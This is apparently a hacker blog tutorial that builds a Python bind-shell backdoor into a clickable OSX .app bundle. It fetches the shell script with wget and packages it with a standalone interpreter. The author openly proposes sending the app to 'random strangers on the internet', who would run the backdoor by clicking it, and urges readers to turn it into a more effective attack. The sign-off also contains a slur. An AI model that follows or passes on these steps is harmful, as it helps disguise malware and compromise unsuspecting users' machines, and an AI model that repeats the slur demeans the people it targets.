Spacecow's Stoned OSX Tips & Tricks I
Creating a simple python backdoor .app for OSX
In this first tutorial, we will be building a standalone python backdoor in an executable .app format for an OSX target. When complete our app will include a standalone python3.4 interpreter, a simple backdoor and the proper folder hierarchy to turn it in to an App bundle that can be executed.
Requirements:- A python script that will create a bind shell.
- The cookiecutter tool installable from pip.
- A standalone python interpreter for OSX.
Downloading Required Tools:First thing we will do is download a simple python shell. In this example we will use a bind shell from
https://github.com/Spacecow99/python-pty-shells/master/sctp_pty_bind.py which was written by infodox from insecurety.net.
$ wget https://raw.githubusercontent.com/Spacecow99/python-pty-shells/master/sctp_pty_bind.py
Our next step is to install cookiecutter from pip. Cookiecutter is a tool from BeeWare used to create project templates for different platforms including OSX, IOS and Android.
$ pip install cookiecutter
Creating Our Backdoor:After this we must create a OSX project by cloning a template repo, in this case from
https://github.com/pybee/Python-OSX-template.
When we are prompter for values you are free to set whatever you wish. In the example below, I have already downloaded the template previously so we will be re-cloning it just to show you, as well as leaving all the values their default.
$ cookiecutter https://github.com/pybee/Python-OSX-template
You've cloned /Users/user/.cookiecutters/Python-OSX-template before. Is it okay to delete and re-clone it? [yes]: yes
Cloning into 'Python-OSX-template'...
remote: Counting objects: 34, done.
remote: Total 34 (delta 0), reused 0 (delta 0), pack-reused 34
Unpacking objects: 100% (34/34), done.
Checking connectivity... done.
app_name [appname]:
formal_name [App Name]:
bundle [com.example]:
year [2015]:
month [July]:
This will produce an 'App\ Name.app' folder or '[formal_name].app' with the following directory tree:
App\ Name.app
└── Contents
├── Info.plist
├── MacOS
│ └── App\ Name
└── Resources/
├── app/
│ └── README
└── app_packages/
└── README
Our application code will go under the app/ directory. The native code will be looking for a appname/__main__.py file as the entry point. We will create a appname directory and paste our backdoor code in to appname/__main__.py.
app/
└──appname/
└──__main__.py
The final step is to add a standalone python interpreter so the app can be run regardless of what python versions are available on the system. We will download our interpreter from
https://github.com/pybee/Python-OSX-support/, extract it and copy it to the Resources/ directory.
$ pwd
'/Users/user/Programming/App\ Name.app/Contents/Resources/'
$ wget https://github.com/pybee/Python-OSX-support/releases/download/3.4.2-b1/Python-3.4.2-OSX-support.b1.tar.gz
$ tar -xzf Python-3.4.2-OSX-support.b1.tar.gz
$ rm Python-3.4.2-OSX-support.b1.tar.gz
This should leave us with a python/ directory containing a python3.4 binary. And with that we should be ready to start sending our application to random strangers on the internet. It will execute once someone clicks on the App\ Name.app icon and remain in the taskbar while the backdoor is running.
Conclusion:Now this is a rather simple and easily discoverable attack but the point of this is to demonstrate how simple it is to quickly throw together a backdoor for OSX targets. With a little more thought one can turn this in to a quick and effective attack vector, but that's up to you to think of.
Stay tuned for more related tutorials from our OSX series. Please let me know about any topics you would like covered in future tutorials, any comments/corrections you have or if you're a macfag interested in contributing to a tutorial.
Sincerely yours,
-Spacecow
